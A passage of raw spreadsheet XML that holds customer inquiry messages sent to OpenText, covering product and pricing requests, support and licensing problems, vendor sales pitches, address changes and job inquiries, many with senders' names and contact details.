Industries: Consumer goods, Healthcare, Aerospace, Electronics, Media and Transit._x000D_
_x000D_
If your target audience is not mentioned above, kindly let me know._x000D_
_x000D_
Send me your target audience and geographical area to understand your needs better so that I can provide you few sample data, updated records and further details for your data evaluation. _x000D_
_x000D_
Looking forward to hear from you._x000D_
_x000D_
Best Regards,_x000D_
Scarlett Frost</t>
  </si>
  <si>
    <t>customer application for Exstream</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Adform, an ad tech company in Denmark, is seeking a document exchange service provider to help create an outbound e-invoicing solution as a part of a long term billing automation program in integration with our Navision ERP. _x000D_
_x000D_
This RFI is an invitation and an opportunity for your company to participate in our knowledge discovery and provider selection process.  It’s issued solely for information and RFP planning purposes, as such it’s not a promise to lead to an RFP in the future. _x000D_
_x000D_
Please provide a contact information or a resource that would be available and skilled in supplying the pertinent information, so I can send them the Adform requirements RFI form._x000D_
_x000D_
We appreciate your response, however if You feel that this request is not compatible with your service offering please let me know as well. _x000D_
Best Regards,_x000D_
Jerzy Bilchuk_x000D_
Enterprise Architect _x000D_
Email: Jerzy.Bilchuk@adform.com _x000D_
Phone: +45 3535 7100_x000D_
Wildersgade 10B, 1. sal, 1408 Copenhagen, Denmark</t>
  </si>
  <si>
    <t>Interested in the product Captiva Capture for the purpose of managing scanned documents.</t>
  </si>
  <si>
    <t>Need access to Support and to be able to request licenses.  Also, contract has NOT expired but we are being told it has and therefore no new licenses are being created.  Please reply asap.  Thanks, Star Moss</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to deactivate my account. It serves no purpose to me._x000D_
_x000D_
Thank you_x000D_
_x000D_
Kind regards,_x000D_
Ivor</t>
  </si>
  <si>
    <t>Hello Support_x000D_
As custom we used Exceed as the X server connection to Unix/Linux OS, however for the last two week attempts failed when installing a MATLAB Neural Networks Toolbox add-on. We tried Xming (X Window System) rather than Exceed as the X server and were able to install add-ons requested by the researchers. For this reason, I am force to conclude there is a bug in the version of Exceed installed on the workstation. I currently have Exceed (Open text 3D) v14, 00 installed on my Desktop computer._x000D_
I believed that there is a bug in Exceed and this issue needs be considered. If you require extra information, please do not hesitate to email me back or call me on (+44) 0121 415 8042._x000D_
_x000D_
Best Regards;_x000D_
Earl Joseph_x000D_
Research Support_x000D_
IT Services_x000D_
University Of Birmingham_x000D_
UK</t>
  </si>
  <si>
    <t>As part of an enterprise-wide digital transformation project ee are looking for cognitive/AI technologies to help us smooth out enterprise IM. We have a few testcases in mind but are also interested in understanding the broader transformational benefits that might accrue from adoption of the right tech. We have done some initial pilots with various vendors but are still exploring the space.</t>
  </si>
  <si>
    <t>For our customer UWV I’m looking for a quote concerning the re-instatement of their Brava licenses for which S&amp;S was terminated at the beginning of 2014. Attached you’ll find the original quote concerning these licenses. This original quote concerns 3000 users. UWV wants re-instatement of the licenses for 1500 users.</t>
  </si>
  <si>
    <t>I can not find my Mac address to install the purchased software. Windows 10... no instructions on your website ... please help</t>
  </si>
  <si>
    <t>My user has been associated with the My Support Account for VILT Brasil Sistemas de Informacao Ltda, I have already clicked on the "Verify Account Association" link present in the email I received but I still can't access "My Support". When I try I keep getting the message: No Access  We're sorry, your account does not grant you access to this resource."</t>
  </si>
  <si>
    <t>ok</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently an intern for Axians ICT Austria._x000D_
My current task is to find a suitable framework to integrate real time data analytics and graphics into their existing application._x000D_
Yesterday (27.07.2017) I found BIRT and found its capability’s and features very good._x000D_
_x000D_
We (Axians) would like to have a live report system where our KPI's (Key Performance Indicators) can be loaded from our oracle database and displayed in our application. We would like to offer our customers a nice dashboard with graphs and tables where they can check how well their business is doing._x000D_
_x000D_
My question is:_x000D_
How to develop an application, running in java with BIRT, that has capabilities of live analytics of data. This could be as simple as loading data from the database every 5 to 10 minutes and updating all relevant graphs._x000D_
The examples that I saw and recreated only showed me how to develop and launch graphs from within eclipse, but not how to develop graphs that update on live data._x000D_
_x000D_
We will be using Spring boot application to code and deploy the application for our customers. Maybe it is possible to integrate BIRT into scheduled jobs, let them fetch data from our database and display the data on our client’s dashboard._x000D_
_x000D_
In case you want to contact me via phone, I am available from 8:15 to 16:40 (UTC+1) on workdays. However a simple link to a tutorial or document with explanation on how to implement live reports would be enough._x000D_
</t>
  </si>
  <si>
    <t>digitalisation of our (non production) purchase flow (purchase to payment) - reference: OpenText project with one of our major shareholders (Kamax)</t>
  </si>
  <si>
    <t>Dear Sir/Madam_x000D_
_x000D_
We had received the screening exercise from Kebabangan Petroleum Operating Company (KPOC) regarding quotation for open text content server (livelink)..</t>
  </si>
  <si>
    <t xml:space="preserve">Creocraft has secured strong clientele including Asian Paints, Bosch, Britannia, Coca Cola, Grofers, Mother Dairy (Delhi), Park Avenue, Cycle Pure Agarbathies, Allied Blenders &amp; Distillers &amp; few others.  _x000D_
_x000D_
I would hereby request you to kindly give us some time for a meeting next week to discuss future business prospects and association with you._x000D_
_x000D_
Thanks, _x000D_
</t>
  </si>
  <si>
    <t>Needed details to download latest version of Documentum Products</t>
  </si>
  <si>
    <t>I came across your website after searching for offshoring companies on google.com_x000D_
_x000D_
And I was wondering if you would like to partner up? _x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote your service online and increase your website conversion rate._x000D_
_x000D_
So I wanted to offer you a 30 second animated whiteboard video for your service for just $197. (including script/voiceover)_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more and get started at www.30secondexplainervideos.com/explainer_x000D_
_x000D_
Or can you shoot me a quick email for a brief discussion!_x000D_
_x000D_
Cheers, Travis Cole_x000D_
www.30secondexplainervideos.com/explainer</t>
  </si>
  <si>
    <t>Maxcom acquired back in 2015 SAP Document Access (Bus Expert, Professional, Limited Professional), SAP Invoice Management and SAP Extended Enterprise Content Management all of them by Open Text. So far, we are only using OpenText in a VIM application, but I assume there’s a lot more we can do with Open Text. We’ve been searching for a consultant firm than can show us all the functionality of the application use it widely in Maxcom, but we haven’t found any one. Neither a learning path or self-training material.  How can you help us to make OpenText a CMS for all our business needs? Who can we approach for consultancy services?</t>
  </si>
  <si>
    <t>Cannot get access to download my Software</t>
  </si>
  <si>
    <t>Working with ShopBop requiring GTIN data on shipped product.  Do not currently use GS1 registered GTINs.</t>
  </si>
  <si>
    <t>Looking for a document management/email filing solutions.</t>
  </si>
  <si>
    <t>Need address to send payment, could not get credit card to work online and have invoice to pay.</t>
  </si>
  <si>
    <t>I need to verify employment, HR was not an option when I called 877-488-8269?  How do I verify employment with  your company?_x000D_
_x000D_
Thank you, Sandy Jordanek</t>
  </si>
  <si>
    <t xml:space="preserve">Please contact me in regard to a letter received in our office. This is my second request. </t>
  </si>
  <si>
    <t>I would like to see a demo of your CMS.</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in learning more about Enterprise Content Management software. </t>
  </si>
  <si>
    <t xml:space="preserve">Information regarding in the EDI space. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I am looking at implementing Oracle's Commerce Cloud Solution for an e-commerce site within our organisation and am currently exploring Oracle partners that would be able to develop, build, implement and support the site on-going._x000D_
Please can you advise if you have expertise and knowledge in this area and would be interested in submitting a proposal for our requirements._x000D_
Thanks,_x000D_
Lee Baker_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We need to open an account with BIRT forum but we are getting below error._x000D_
Also we would like to know how can we open a paid account if any. </t>
  </si>
  <si>
    <t>interested in purchasing opentext</t>
  </si>
  <si>
    <t>Tech partnering - qualifying OpenText products with IBM Cloud Object Storage</t>
  </si>
  <si>
    <t>Dear mr./mrs,_x000D_
_x000D_
I would like te get further information about your company. We received a letter from your company as a customer. But  your company is not known as a supplier._x000D_
_x000D_
Could you give me further information about the services and contracts VieCuri has with Opentext?_x000D_
_x000D_
Thank you!_x000D_
_x000D_
With kind regards,_x000D_
_x000D_
Janine Wijnsema</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I would like to get in touch with the appropriate person who can discuss about a potential partnership with our training center in Romania._x000D_
Our company, IT Expert Technologies, has been set up by a Documentum Specialist and we would like to offer workshops and trainings on Documentum area to the students in technical fields._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Looking for new option for system retirement/archiving/decommissioning. Had discussed with EMC who is now with Dell who says Opentext acquired this line of business.</t>
  </si>
  <si>
    <t>Look to research cost for on-site training in US and in Chennai, India. Thank you.</t>
  </si>
  <si>
    <t>We are in a process of evaluating OpenText Web content Management along with Hybris commerce solution. We would like to find out the training and licensing cost for Private Class for OpenText Web content management and Integration with SAP Hybris Commerce platform. Request you to provide a training quotation for the same.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
My name is Eliseu Kaleniuk and I work at Targetware Informatica, a Brazilian reseller company. We have an open opportunity in our system, could you please help me with the quote?_x000D_
_x000D_
Product: Brava Desktop _x000D_
Quantity: 8_x000D_
License: Commercial_x000D_
Platform: Windows_x000D_
_x000D_
Kind Regards,_x000D_
Eliseu Kaleniuk</t>
  </si>
  <si>
    <t>Sports Direct is a current Optimost client. During our annual ecommerce meetings we discussed increasing the amount of A/B testing we do on our websites with Optimost. _x000D_
_x000D_
However, we have a problem - our main site tends to crash when we turn A/B testing on._x000D_
_x000D_
I'd like to get some insight for the cause of the crashes - is this an issue other companies using Optimost are seeing? Or is it potentially a mis-integration or other issue on our side?_x000D_
_x000D_
Cheers,_x000D_
Steve Kaschinske_x000D_
Systems Architect_x000D_
Sports Direct</t>
  </si>
  <si>
    <t>Could you please provide a quote for S-IGR-3-SPS-KIT Brava! for SharePoint - Docs_x000D_
_x000D_
100 licenses for Production_x000D_
10 licenses for UAT_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dan</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Madam/ Sir, _x000D_
see below for adress-change Shimano Europe Holding BV _x000D_
_x000D_
Please in future mail to: _x000D_
Shimano Europe BV_x000D_
creditorssegh@shimano-eu.com_x000D_
_x000D_
Shimano Europe Holding BV_x000D_
creditorsseh@shimano-eu.com_x000D_
_x000D_
Shimano Europe Fishing Holding_x000D_
creditorssefh@shimano-eu.com_x000D_
_x000D_
Shimano Europe Bike Holding BV_x000D_
creditorssebh@shimano-eu.com_x000D_
_x000D_
Shimano Benelux BV_x000D_
creditorssbx@shimano-eu.com_x000D_
_x000D_
Shimano Europe Retail Division BV_x000D_
creditorsserd@shimano-eu.com_x000D_
_x000D_
Bikefitting.com BV_x000D_
creditorsbfc@shimano-eu.com_x000D_
_x000D_
_x000D_
_x000D_
Old adress:_x000D_
Industrieweg 24_x000D_
8071 CT Nunspeet, Nederland_x000D_
_x000D_
New adress:_x000D_
Shimano Europe Holding B.V._x000D_
Postbus 1283_x000D_
5602 BG Eindhoven, Nederland_x000D_
_x000D_
Thanks in advance_x000D_
</t>
  </si>
  <si>
    <t>Website error:_x000D_
Noticed this page has the old brand image used in "Documentum is now OpenText" logo. http://www.opentext.com/what-we-do/products/enterprise-content-management</t>
  </si>
  <si>
    <t>We have received your letter 'Belangrijke mededeling van OpenText'.  Can you please remove the addresses below from your mailing list? As according to my information we are no customer of OpenText anymore.  If you think Lely is a current customer, please send me the name of your contact person. So I can forward your letter to the right person._x000D_
_x000D_
the addresses are: _x000D_
Lely Industries NV_x000D_
Weverskade 110_x000D_
3147 PA Maassluis_x000D_
_x000D_
and_x000D_
_x000D_
Lely Services BV_x000D_
Cornelis van der Lelylaan 1_x000D_
3147PB Maassluis_x000D_
_x000D_
Kind regards,_x000D_
Yvonne de Jong</t>
  </si>
  <si>
    <t>Rechnungsklärung - Am 19.04.2017 haben wir telefonisch den Auftrag zur Rechnung Nr. SRAG08225356 abgefordert. Bisher haben wir nach wie vor keine Rückmeldung erhalten. Die Rechnung kann ohne Zuordnung nicht angewiesen werden._x000D_
Wir bitten um Rückmeldung bis zum 11.08.2017, ansonsten sehen wir uns gezwungen die Rechnung abzulehnen. Vielen Dank.</t>
  </si>
  <si>
    <t>My name is Voight Thornton I was following up to see if there are any Inside Sales Positions open for hire in  Arizona. _x000D_
_x000D_
Thank you for your time._x000D_
_x000D_
Online Retail / Services_x000D_
Relationship Management_x000D_
Forecasting_x000D_
Telemarketing_x000D_
Strategic Planning_x000D_
Cross-Functional Teamwork_x000D_
Sales/Marketing Campaigns_x000D_
Lead Generation / Management_x000D_
_x000D_
_x000D_
Cordially Submitted,_x000D_
_x000D_
_x000D_
_x000D_
____________________x000D_
Voight Thornton</t>
  </si>
  <si>
    <t>Need training or materials for xPression</t>
  </si>
  <si>
    <t>I'm interested to know about Open Text Composer Notes solution for Lotus Notes conversion to .Net.</t>
  </si>
  <si>
    <t>Hi, Could you please provide an idea of your costs?_x000D_
_x000D_
We are a market research agency and we are interested in using a text analytics tool in a project that will obtain 7000 satisfaction interviews quarterly._x000D_
_x000D_
What other information do you need to get an idea of the cost of your specialized tool to help us?_x000D_
_x000D_
Best regards._x000D_
Sergio.</t>
  </si>
  <si>
    <t>We'll raise necessary query for our plan to migrate the server of our Opentext Cache Server to Virtual Machine. Is it supported?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My company is a technology company that works with movie studios so we have a large amount of test files we need to keep track of with various different file types (movie files of all types, audio files, picture files, etc).  We have a need for a digital asset management tool.  Your solution might work for me so I wanted to reach out._x000D_
Types of features I’m looking for:_x000D_
•	Backups, file location handling, etc – basically stuff I think you can already do_x000D_
•	File versioning – so that I can keep track of history_x000D_
•	Tagging/labeling – so that each file version can have info tracking_x000D_
•	Searchable database_x000D_
o	I want to be able to search for modified dates, versions, tags, file type…that kind of thing_x000D_
_x000D_
Thank you,_x000D_
Kent</t>
  </si>
  <si>
    <t>Product Enquiry</t>
  </si>
  <si>
    <t>I had heard that legal key for conflicts was being sunsetted, and then recently I heard it was not.  I wanted to find out what your plans for it are and what kind of improvements have you already and intend to make.  We currently use LegalKey and are trying to determine whether or not we should keep it move to a different product.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm wondering who  I can contact about business/sponsor inquiries. I work for an organization called the International Data Engineering and Science Association (IDEAS) located in Los Angeles, CA. We're founded by Jason Geng, also the founder of Data Application Lab._x000D_
_x000D_
We're looking for data science bootcamps to be sponsors for our SoCal Data Science Conference 2017 event on October 21-22 and would like to know if there's someone I can reach to discuss that particular matter._x000D_
_x000D_
Best,_x000D_
_x000D_
Anthony Tan_x000D_
Events &amp; Outreach Coordinator_x000D_
IDEAS_x000D_
Phone: (805) 637-6803_x000D_
anthony@ideassn.org_x000D_
www.ideassn.org</t>
  </si>
  <si>
    <t>tenant contact person for rent payments</t>
  </si>
  <si>
    <t>I'd like to learn more about the product offerings of opentext</t>
  </si>
  <si>
    <t>Pricing for WFM</t>
  </si>
  <si>
    <t>Company Data</t>
  </si>
  <si>
    <t>Access to Enterprise World 2017 breakout session presentations</t>
  </si>
  <si>
    <t>I am needing a contact for invoices needing to be paid.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested to get in touch with Top Decision Makers of Legal Industry?_x000D_
_x000D_
We have the complete contact details and verified email addresses of Owner, President, Director, Manager, COO, CEO, Contract Administrator, Lawyer, Legal Secretary, Legal Support, Licensing Examiner/Inspector, Revenue Agent, Tax Examiner, Founder, Chief development officer, HR Manager and all manner of key decision makers from various industries who might be interested in your product/services._x000D_
_x000D_
Industries covered: Law firms, Finance, Insurance, Accounting, Networking, Marketing &amp; Advertising, Labeling, Electronics, Healthcare, IT Software/Hardware, Hospitality, Retail, Education, Mining, Oil and Gas, Waste Water management, Energy &amp; Utility, Textile and printing, Transportation, Manufacturing, Food &amp; Beverage, Construction, Automobiles, Defense, Aviation and many more._x000D_
_x000D_
Kindly let me know your target criteria:_x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Looking forward to continued success with you._x000D_
_x000D_
Best Regards,_x000D_
Lee Johnson_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I want to understand if you have an AP vendor portal where internal and external clients can utilize in a self service manner.  The portal could allow AP's internal and external clients the ability to inquire on the status of payments without having to call their AP representative.  The portal could also serve as an option for vendors to submit invoices instead of mailing or emailing AP directly.  </t>
  </si>
  <si>
    <t>Looking at eFax verses Rightfax for ease of use and cost going forward. We currently have both technologies in place.</t>
  </si>
  <si>
    <t>​​_x000D_
To Whom It May Concern:_x000D_
_x000D_
My name is Nathan Segal and I have been working as a Freelance Writer for 18 years. In that time, I have written 957 articles and published 8 books. I’m interested in working for you and I’d like to know more about your requirements. _x000D_
_x000D_
My articles been published in many popular magazines, including: CE Tips (Consumer Electronics), Computer Graphics World, Database Journal, Mac Design, Photoshop User, Rangefinder, Smart Computing, The Computer Paper, Streaming Media World, HTML Goodies, CIO,  and Windows Expert._x000D_
_x000D_
I worked as an Associate Editor at WebReference.com for five years. I also wrote several feature columns on 3D and video tutorials. _x000D_
_x000D_
I was the sole columnist at StreamingMediaWorld.com and wrote 111 articles over a 16 month period. _x000D_
_x000D_
My books are: The Photoshop Companion, How to Speed up Your Computer: In 30 Minutes or Less, Professional Photographic MS Word Templates, The Corel PHOTO-PAINT X4 Insider, How To Position Yourself As An Expert In Any Industry and Secrets of Profitable FreelanceWriting._x000D_
_x000D_
Here are some links to articles I've written over the years: _x000D_
_x000D_
http://www.cio.com/article/2389317/web-analytics/how-to-get-started-with-google-analytics.html_x000D_
http://www.cio.com/article/2388832/small-business/how-to-increase-sales-with-sms-text-messaging.html_x000D_
http://www.cio.com/article/2387932/advertising/how-to-increase-your-online-sales-with-a-b-testing.html_x000D_
http://windowssecrets.com/best-utilities/revisiting-ms-technets-updated-autoruns-utility/_x000D_
http://windowssecrets.com/best-utilities/solving-complex-os-issues-with-process-monitor/_x000D_
http://windowssecrets.com/best-utilities/a-tour-through-windows-process-explorer-part-1/_x000D_
_x000D_
You can reach me at: visualartist49@gmail.com, (408) 844-4851 or Nathan.Segal on Skype._x000D_
_x000D_
I look forward to hearing from you. _x000D_
_x000D_
Yours truly,_x000D_
_x000D_
Nathan Segal_x000D_
_x000D_
P.S. My social media profiles are:_x000D_
_x000D_
https://www.linkedin.com/in/nathansegal/_x000D_
https://twitter.com/nathansegal_x000D_
https://www.faceboo</t>
  </si>
  <si>
    <t>Request access to support for Rightfax</t>
  </si>
  <si>
    <t>Would like information regarding your document imaging solution</t>
  </si>
  <si>
    <t>Checking on status of software support / maintenance agreement.  Please provide expiration date of current agreement.  Customer Number 370688.</t>
  </si>
  <si>
    <t>Need a trial key for Team Dev. 5.2 - We are running Infor Visual Manufacturing and QA, so I need this version.</t>
  </si>
  <si>
    <t xml:space="preserve">Faxpress 9.1 software.  Captaris FaxPress 2L- Hardware.  My HD crashed and I don't have the software to reinstall._x000D_
</t>
  </si>
  <si>
    <t>I need a quotation for 1 server and 3 users for Open Text HostExplorer/unix</t>
  </si>
  <si>
    <t>Looking for a fax solution for our Fuji RIS system please call me</t>
  </si>
  <si>
    <t>3-0188 OpenText Content Server System Administrator v16_x000D_
_x000D_
Good Morning_x000D_
I am interested in the course 3-0188 in person._x000D_
I appreciate your support to provide me information on the dates and venues for this course as well as those involved in the ECM suite.</t>
  </si>
  <si>
    <t>Hello, _x000D_
I am contacting you today to invite you to a free trial of our services. Pharmaleaders is an online news resource for life science executives. We have roughly 200,000 subscribers to our website and emails. We would be happy to include a whitepaper on our website, www.pharmaleaders.com free of charge. Let me know if you would like to take advantage of this opportunity! I look forward to hearing from you._x000D_
Best, _x000D_
Kim</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am wondering where I can find all the presentation slide decks from the breakout sessions from EW2017._x000D_
_x000D_
Thanks! _x000D_
Glenn</t>
  </si>
  <si>
    <t>We are an OpenText Documentum customer.  I was unable to attend Enterprise World 2017, but if the Documentum Roadmap session information could be shared it would be very helpful in understanding the intentions and development and support timelines for this product stack.  Thank you.</t>
  </si>
  <si>
    <t>I am looking to find one of my team members training for VIM.  He will become our team expert.  All of the courses I see are virtual for U.S.  Is this correct?  Will there be any onsite?  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Overview of Open Text documental Workflow and SAP Integration  </t>
  </si>
  <si>
    <t>Need a copy of the click through EULA for Brava! Desktop</t>
  </si>
  <si>
    <t>I have a problem with the keyboard language when working with the exceed open text V.14, please I require technical assistance._x000D_
Tks.</t>
  </si>
  <si>
    <t>Hello, we are running a Gauss Interprise Document Manager Release 8.1 service on our IBM iSeries.  I am having a couple of issues with it and was wondering whether you used to be known as Gauss Interprise and whether you can still help me?</t>
  </si>
  <si>
    <t>I need a contact to demand  payment of passed due date invoices_x000D_
I have a difference between your selfbillings and our invoices._x000D_
Thanks for your help_x000D_
Best regards</t>
  </si>
  <si>
    <t xml:space="preserve">Can I please get a quote for the following?:_x000D_
_x000D_
Opentext RightFax_x000D_
QTY: 1 license_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for a license for - OpenTxt Live._x000D_
I have a user in the UAE that would like to use this software and need a quote to submit to our purchasing group, please. _x000D_
Kind regards,_x000D_
Dale Worster _x000D_
Sr. IT Eng. Sys. Licensing Specialist ♦ GSS_x000D_
Parsons_x000D_
Office: (704) 558-4029 _x000D_
Dale.Worster@Parsons.com </t>
  </si>
  <si>
    <t>Are you able to open an account only for one UK customer for Tradacom version doc ? Thank you</t>
  </si>
  <si>
    <t>Hello Team, _x000D_
We are, Citi Application Readiness Team, need your assistance in order to gather info about below application compatibility and support for Win 10 as part of Window 10 Readiness initiative. CITI Bank has been using your software currently on Win 7 operating system._x000D_
We would like to know whether the below listed application is compatible and supported even for Win 10 (64 Bit) or is there any other higher version of application which would be compatible for Win10. If you have not tested for Win 10, could you please provide us with a tentative date by when we can reach you._x000D_
Application Name :  EoD Launcher for CWS v12.9.18</t>
  </si>
  <si>
    <t>We want you to send us  EXCEED 15 (Open text exceed)_x000D_
What is the payment method? With a credit card?_x000D_
What is the delivery method?</t>
  </si>
  <si>
    <t>1. Sharepoint integration component- Is this something one can buy?_x000D_
2. What happens now that mozilla have upgraded and removed the jre component. What is the solution to working with openText case360?</t>
  </si>
  <si>
    <t>we're looking for scanning solution along with workflow</t>
  </si>
  <si>
    <t xml:space="preserve">need a quote for license renewal for right fax to one of my clients </t>
  </si>
  <si>
    <t>New client requires EDI</t>
  </si>
  <si>
    <t>Discussion</t>
  </si>
  <si>
    <t>I need a contact email to send a RFI for our project of eTMF.</t>
  </si>
  <si>
    <t>We'd like to integrate our android application to work with Right fax. so let me ask you about SDK or API and sanbox information for testing. Thanks.</t>
  </si>
  <si>
    <t>I am trying to get access to My Support to get my licence key but it keeps saying I do not have My Support_x000D_
I also resent the confirmation which say well done I have my support but when I go in it says no support_x000D_
Very confusing</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am a student in the computing support program at a Technical school (Pearson Electrotechnology Centre) and i am currently looking for possible stage placements at the moment. I was wondering if it could be a possibility doing my stage(240 hours / 8 weeks) at Opentext?_x000D_
_x000D_
Regards,_x000D_
Jeremy</t>
  </si>
  <si>
    <t>Requirement to redact a large amount of files</t>
  </si>
  <si>
    <t>One of our users recently began receiving a mailbox full message when sending an email, "Your mailbox is full. Please contact your administrator." The account is set for Unlimited Daily connection limit and Unlimited Disk space limit. The disk space used is: 12100192k. There is no loss of functionality. What would cause this and how to fix it?</t>
  </si>
  <si>
    <t>I would like to set up a GXS Catalog so that Macy's and some of our other customers can download our part data/UPC data into their systems. We will be implementing and ERP so I will not be able to send and EDI file for another 6 months. I would like to start the catalog using the upload tool and then transition into EDI when the ERP project is further along. Please call my mobile with any questions,7144689434.  Or, please send rate quote and next step instructions to my email listed above. Thanks. Mia</t>
  </si>
  <si>
    <t>Our company had a demo in Feb. 2017 with Jason Cohen. I've recently joined the company and am revisiting our requirements for Contract Management solution. One of our Legal team is especially interested in hearing more about the Hummingbird product, how it's integrated._x000D_
_x000D_
Is Jason still with OpenText?_x000D_
- If so, please ask him to contact me._x000D_
- If not, would still like to hear from you._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Need to add new GS1 (UCC/EAN) Company Prefix to our Catalogue.</t>
  </si>
  <si>
    <t>Information regarding connection with customer EDI.</t>
  </si>
  <si>
    <t xml:space="preserve">Our end goal is to replace all of our legacy departmental analog fax machines and move to a system that will integrate with Cisco Call Manager 10.x and Cisco Unity 10.x_x000D_
The question or concern though is who or what group then receives all of the faxes if previously the faxes went to a central physical location.  How do we maintain FERPA and HIPAA compliance if a fax is sent to a department fax number but is addressed to Mary, but ends up in Paul's box?_x000D_
Idaho State University uses Google for our email under the domain of isu.edu_x000D_
As such we would need seamless integration with Gmail via the native Gmail web interface and MS Outlook._x000D_
We have 8 PRI’s of which 4 are dedicated to our Cisco CM and the other 4 are dedicated to our legacy ROLM PBX.  We have an interest in the idea of Single number VOIP/FOIP where our gateways connected to the PRI’s would answer, listen, then route the call based on hearing fax tones or not._x000D_
Other features of interest would be to illuminate the MWI on our VOIP devices to indicate we have a VM, FAX, etc… in our Unity Box._x000D_
Please be advised that this is a technical inquiry.  I do not have the power to make any financial decisions.  When the time comes, that will be passed to a different group of administrators._x000D_
</t>
  </si>
  <si>
    <t>Interested in purchasing a second floating license for our Imagination 8.3 software</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
Can you please connect me with the federal office of Open Text and the account representative who covers the Intelligence Community? _x000D_
_x000D_
Thank you, _x000D_
_x000D_
Reid McBride_x000D_
reid.mcbride@triadtechpartners.com_x000D_
571-992-5717</t>
  </si>
  <si>
    <t>I am exploring Cloud native ECM solution and OpenText seems to be a leader in this space. Would request sales team to contact me so that we can work on a TCO proposal._x000D_
Thanks</t>
  </si>
  <si>
    <t>call me about active project for Content Management 25 users</t>
  </si>
  <si>
    <t>Trying to download information regarding opentext and interfacing(API) but your webpage insists on logging in but will not let me create an account.</t>
  </si>
  <si>
    <t xml:space="preserve">I have TeleForm v10.5.2 Perpetual  License._x000D_
I changed the machine  that I use TeleForm, could you send me another activation code?_x000D_
 _x000D_
Thank's,_x000D_
Alexander Gomes_x000D_
Fundação CAVE_x000D_
Brazil_x000D_
_x000D_
License CODE  TA0200-001H08-040001-H000AR-S000EP-2L847S _x000D_
- End-User:......................................................FUNDACAO CAVE - Operating System:..............................................WINDOWS NT/2000/XP - Product Serial Number:.........................................810304 - Total Readers:.................................................1 - Total Designers:...............................................1 - Total Verifiers:...............................................1 - Total Scan Stations:...........................................1 - Auto Merge Publishers:.........................................1 - Total Workstations:............................................1 - Maximum number of copies of Product permitted:.................1 - Product Usage:.................................................Production - Product Model:.................................................Desktop - Product Scope:.................................................Internal - Product Use permitted for On-Line Service from which    you receive compensation from subscription fees,    advertising or other sources:................................No - Term of the License Agreement:.................................Perpetual  Year(s) - EULA:..........................................................494.10_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Will presentations from EW 2017 be available for download for attendees? We were told they would be. </t>
  </si>
  <si>
    <t>We are receiving an enormous amount of fax phone calls to our main business phone number.  The calls come from  (800)396-9402. There is a voice message to access opentext.com/block, but I cannot find where to click to stop the fax phone calls.  Your help to stop these calls will be appreciated.</t>
  </si>
  <si>
    <t>Would like to implement Documentum at site in 2018. Currently seeking budget numbers. Parent India facilities use Documentum, and will roll it out to global sites.</t>
  </si>
  <si>
    <t>We have received in the post from your address (3671 Ridge Mill Drive Hilliard OH US 43026) a letter addressed to 'University of Suffolk, Gifford House, The Valley Ctr, Gordon Road, High Wycombe, GB, HP13 6EQ'. The letter has come to Maiden Global Holdings Ltd which is a company situated in the Valley Centre in High Wycombe. However, I am unsure whether there is a University of Suffolk office here. And I have not seen Gifford House before. I therefore believe you have an incorrect address. Please can you advise what you would like me to do with the letter. Thanks._x000D_
_x000D_
Best,_x000D_
Naomi Marchant (Office Administrator)</t>
  </si>
  <si>
    <t>I was needing to download Exceed 3D onto my computer for work. I know some co-workers have Exceed 3D installed on their PC's. I was wondering if I am able to download Exceed 3D because I believe we have the extra licenses needed. I guess if you can clarify if Orbital ATK has the necessary licensing for me to install Exceed 3D and/or the steps I need to take to get Exceed 3D downloaded. _x000D_
_x000D_
Thanks,_x000D_
John</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I'm looking for a quote for an Imagenation license for The City of London.  We currently have users using Spicer Imagenation 8.3 and they have asked me to find out if they can purchase an additional license for this software.  Thanks.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I would like to have more details regarding the SAP-Documentum integration.  A demonstration would probably be a good approach._x000D_
_x000D_
Thanks,_x000D_
Alexis Robert</t>
  </si>
  <si>
    <t>I want to know about rightfax server reseller partner in Kuwait as well as for other products</t>
  </si>
  <si>
    <t>I updated my email address from our old format of goodinjd@gov.ns.ca to our current format of jeff.goodine@novascotia.ca . This seems to have broken its access and I was wondering if you could resolve it. _x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>To discuss about an electronic document management system.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to change my Contract/Service Agreement.  It's coming up for renewal.  I Attempted to reach my sales rep usuccessfully.  Who do I need to contact? or can someone contact me?_x000D_
</t>
  </si>
  <si>
    <t>accenture suposedly has a contract with OpenText. However, I am not able to access 'My Support' to be able to go through the online resources available. After registering, I received a confirmation mail reading 'Dear Pallavi Chaturvedi, _x000D_
_x000D_
Congratulations! You now have access to the Online Support Resources available through My Support.' ._x000D_
Could you please help me granting this access?</t>
  </si>
  <si>
    <t>Bom dia,_x000D_
